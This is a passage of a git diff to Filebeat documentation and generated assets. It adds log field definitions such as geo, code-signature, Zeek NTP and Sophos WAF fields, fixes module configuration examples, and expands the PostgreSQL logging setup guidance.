+*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -44324,6 +44947,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -44446,6 +45081,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -45184,6 +45828,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -45241,6 +45896,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -45263,6 +45930,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -45276,9 +45954,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -45646,6 +46327,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -45703,6 +46395,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -45725,6 +46429,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -45738,9 +46453,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: @@ -66068,7 +66786,7 @@ type: keyword SAML status code. -type: long +type: keyword -- @@ -66078,7 +66796,7 @@ type: long SAML second level status code. -type: long +type: keyword -- @@ -67332,7 +68050,7 @@ type: keyword SAML status code. -type: long +type: keyword -- @@ -67342,7 +68060,7 @@ type: long SAML second level status code. -type: long +type: keyword -- @@ -111540,7 +112258,7 @@ type: keyword The list of targets. -type: array +type: flattened -- @@ -112385,6 +113103,16 @@ Specifies the sub type of the log -- +*`panw.panos.virtual_sys`*:: ++ +-- +Virtual system instance + + +type: keyword + +-- + [[exported-fields-pensando]] == Pensando fields @@ -140689,13 +141417,7 @@ type: keyword -- [float] -=== sophos - - - - -[float] -=== xg +=== sophos.xg Module for parsing sophosxg syslog. @@ -141491,7 +142213,7 @@ type: keyword -- -*`sophos.xg.FTP_url`*:: +*`sophos.xg.ftp_url`*:: + -- FTP URL from which virus was downloaded @@ -141501,7 +142223,7 @@ type: keyword -- -*`sophos.xg.FTP_direction`*:: +*`sophos.xg.ftp_direction`*:: + -- Direction of FTP transfer: Upload or Download @@ -142557,6 +143279,26 @@ type: keyword clients connection ssid +type: keyword + +-- + +*`sophos.xg.sqli`*:: ++ +-- +The related SQLI caught by the WAF + + +type: keyword + +-- + +*`sophos.xg.xss`*:: ++ +-- +The related XSS caught by the WAF + + type: keyword -- @@ -159340,6 +160082,143 @@ type: keyword -- +[float] +=== ntp + +Fields exported by the Zeek NTP log. + + + +*`zeek.ntp.version`*:: ++ +-- +The NTP version number (1, 2, 3, 4). + + +type: integer + +-- + +*`zeek.ntp.mode`*:: ++ +-- +The NTP mode being used. + + +type: integer + +-- + +*`zeek.ntp.stratum`*:: ++ +-- +The stratum (primary server, secondary server, etc.). + + +type: integer + +-- + +*`zeek.ntp.poll`*:: ++ +-- +The maximum interval between successive messages in seconds. + + +type: double + +-- + +*`zeek.ntp.precision`*:: ++ +-- +The precision of the system clock in seconds. + + +type: double + +-- + +*`zeek.ntp.root_delay`*:: ++ +-- +Total round-trip delay to the reference clock in seconds. + + +type: double + +-- + +*`zeek.ntp.root_disp`*:: ++ +-- +Total dispersion to the reference clock in seconds. + + +type: double + +-- + +*`zeek.ntp.ref_id`*:: ++ +-- +For stratum 0, 4 character string used for debugging. For stratum 1, ID assigned to the reference clock by IANA. Above stratum 1, when using IPv4, the IP address of the reference clock. Note that the NTP protocol did not originally specify a large enough field to represent IPv6 addresses, so they use the first four bytes of the MD5 hash of the reference clock’s IPv6 address (i.e. an IPv4 address here is not necessarily IPv4). + + +type: keyword + +-- + +*`zeek.ntp.ref_time`*:: ++ +-- +Time when the system clock was last set or correct. + + +type: date + +-- + +*`zeek.ntp.org_time`*:: ++ +-- +Time at the client when the request departed for the NTP server. + + +type: date + +-- + +*`zeek.ntp.rec_time`*:: ++ +-- +Time at the server when the request arrived from the NTP client. + + +type: date + +-- + +*`zeek.ntp.xmt_time`*:: ++ +-- +Time at the server when the response departed for the NTP client. + + +type: date + +-- + +*`zeek.ntp.num_exts`*:: ++ +-- +Number of extension fields (which are not currently parsed). + + +type: integer + +-- + [float] === ocsp diff --git a/filebeat/docs/index.asciidoc b/filebeat/docs/index.asciidoc index 69633f6836d..5193aef8667 100644 --- a/filebeat/docs/index.asciidoc +++ b/filebeat/docs/index.asciidoc @@ -22,6 +22,7 @@ include::{asciidoc-dir}/../../shared/attributes.asciidoc[] :has_docker_label_ex: :has_modules_command: :has_kubernetes_logs_path_matcher: +:has_nomad_logs_path_matcher: :has_registry: :deb_os: :rpm_os: diff --git a/filebeat/docs/modules/juniper.asciidoc b/filebeat/docs/modules/juniper.asciidoc index a2d2a0100d3..8b7b8d50ae1 100644 --- a/filebeat/docs/modules/juniper.asciidoc +++ b/filebeat/docs/modules/juniper.asciidoc @@ -73,7 +73,7 @@ Versions above this are expected to work but have not been tested. [source,yaml] ---- -- module: sophosxg +- module: junos firewall: enabled: true var.input: udp diff --git a/filebeat/docs/modules/microsoft.asciidoc b/filebeat/docs/modules/microsoft.asciidoc index f446d8a5bb6..f82d99f3c27 100644 --- a/filebeat/docs/modules/microsoft.asciidoc +++ b/filebeat/docs/modules/microsoft.asciidoc @@ -54,7 +54,9 @@ Example config: enabled: true var.oauth2.client.id: "123abc-879546asd-349587-ad64508" var.oauth2.client.secret: "980453~-Sg99gedf" - var.oauth2.token_url: "https://login.microsoftonline.com/INSERT-TENANT-ID/oauth2/token" + var.oauth2.token_url: "https://login.microsoftonline.com/INSERT-TENANT-ID/oauth2/v2.0/token" + var.oauth2.scopes: + - "https://api.security.microsoft.com/.default" ---- *`var.oauth2.client.id`*:: @@ -69,6 +71,10 @@ The secret related to the client ID. A predefined URL towards the Oauth2 service for Microsoft. The URL should always be the same with the exception of the Tenant ID that needs to be added to the full URL. +*`var.oauth2.scopes`*:: + +A list of included scopes, should use .default unless different is specified. + [float] ==== 365 Defender ECS fields diff --git a/filebeat/docs/modules/postgresql.asciidoc b/filebeat/docs/modules/postgresql.asciidoc index 695a30dffdd..7483be9ac21 100644 --- a/filebeat/docs/modules/postgresql.asciidoc +++ b/filebeat/docs/modules/postgresql.asciidoc @@ -26,6 +26,80 @@ The +{modulename}+ module using `.log` was tested with logs from versions 9.5 on The +{modulename}+ module using `.csv` was tested using versions 11 and 13 (distro is not relevant here). +[float] +=== Supported log formats + +This module can collect any logs from PostgreSQL servers, but to be able to +better analyze their contents and extract more information, they should be +formatted in a determined way. + +There are some settings to take into account for the log format. + +Log lines should be preffixed with the timestamp in milliseconds, the process +id, the user id and the database name. This uses to be the default in most +distributions, and is translated to this setting in the configuration file: + +["source","sh"] +---------------------------- +log_line_prefix = '%m [%p] %q%u@%d ' +---------------------------- + +PostgreSQL server can be configured to log statements and their durations and +this module is able to collect this information. To be able to correlate each +duration with their statements, they must be logged in the same line. This +happens when the following options are used: + +["source","sh"] +---------------------------- +log_duration = 'on' +log_statement = 'none' +log_min_duration_statement = 0 +---------------------------- + +Setting a zero value in `log_min_duration_statement` will log all statements +executed by a client. You probably want to configure it to a higher value, so it +logs only slower statements. This value is configured in milliseconds. + +When using `log_statement` and `log_duration` together, statements and durations +are logged in different lines, and {beatname_uc} is not able to correlate both +values, for this reason it is recommended to disable `log_statement`. + +NOTE: The PostgreSQL module of Metricbeat is also able to collect information +about all statements executed in the server. You may chose which one is better +for your needings. An important difference is that the Metricbeat module +collects aggregated information when the statement is executed several times, +but cannot know when each statement was executed. This information can be +obtained from logs. + +Other logging options that you may consider to enable are the following ones: + +["source","sh"] +---------------------------- +log_checkpoints = 'on'; +log_connections = 'on'; +log_disconnections = 'on'; +log_lock_waits = 'on'; +---------------------------- + +Both `log_connections` and `log_disconnections` can cause a lot of events if you +don't have persistent connections, so enable with care. + +[float] +=== Using CSV logs + +Since the PostgreSQL CSV log file is a well-defined format, +there is almost no configuration to be done in {beatname_uc}, just the filepath. + +On the other hand, it's necessary to configure postgresql to emit `.csv` logs. +The recommended parameters are: + +["source","sh"] +---------------------------- +logging_collector = 'on'; +log_destination = 'csvlog'; +---------------------------- + + include::../include/configuring-intro.asciidoc[] The following example shows how to set paths in the +modules.d/{modulename}.yml+ @@ -69,38 +143,14 @@ The first dashboard is for regular logs. [role="screenshot"] image::./images/filebeat-postgresql-overview.png[] -The second one shows the slowlogs of PostgreSQL. +The second one shows the slowlogs of PostgreSQL. If `log_min_duration_statement` +is not used, this dashboard will show incomplete or no data. [role="screenshot"] image::./images/filebeat-postgresql-slowlog-overview.png[] :has-dashboards!: -=== Using CSV logs - -Since the PostgreSQL CSV log file is a well-defined format, -there is almost no configuration to be done in filebeat, just the filepath - -On the other hand, it's necessary to configure postgresql to emit `.csv` logs. -The recommended parameters are: - -``` -logging_collector = 'on'; -log_destination = 'csvlog'; -log_statement = 'none'; -log_checkpoints = on; -log_connections = on; -log_disconnections = on; -log_lock_waits = on; -log_min_duration_statement = 0; -``` - -In busy servers, `log_min_duration_statement` can cause contention, so you can assign -a value greater than 0. - -Both `log_connections` and `log_disconnections` can cause a lot of events if you don't have -persistent connections, so enable with care. - :fileset_ex!: :modulename!: diff --git a/filebeat/docs/modules/threatintel.asciidoc b/filebeat/docs/modules/threatintel.asciidoc index 588ff726e02..fa98046f2d5 100644 --- a/filebeat/docs/modules/threatintel.asciidoc +++ b/filebeat/docs/modules/threatintel.asciidoc @@ -125,7 +125,7 @@ should look initially, and optionally any filters used to filter the results. var.input: httpjson var.url: https://SERVER/events/restSearch var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z - var.initial_interval: 24h + var.first_interval: 24h var.interval: 60m ---- @@ -147,7 +147,7 @@ reference the MISP fields located on the MISP server itself. var.filters: - type: ["md5", "sha256", "url", "ip-src"] - threat_level: 4 - var.initial_interval: 24h + var.first_interval: 24h var.interval: 60m ---- diff --git a/filebeat/include/fields.go b/filebeat/include/fields.go index 0048fd9507c..169c268b2c9 100644 --- a/filebeat/include/fields.go +++ b/filebeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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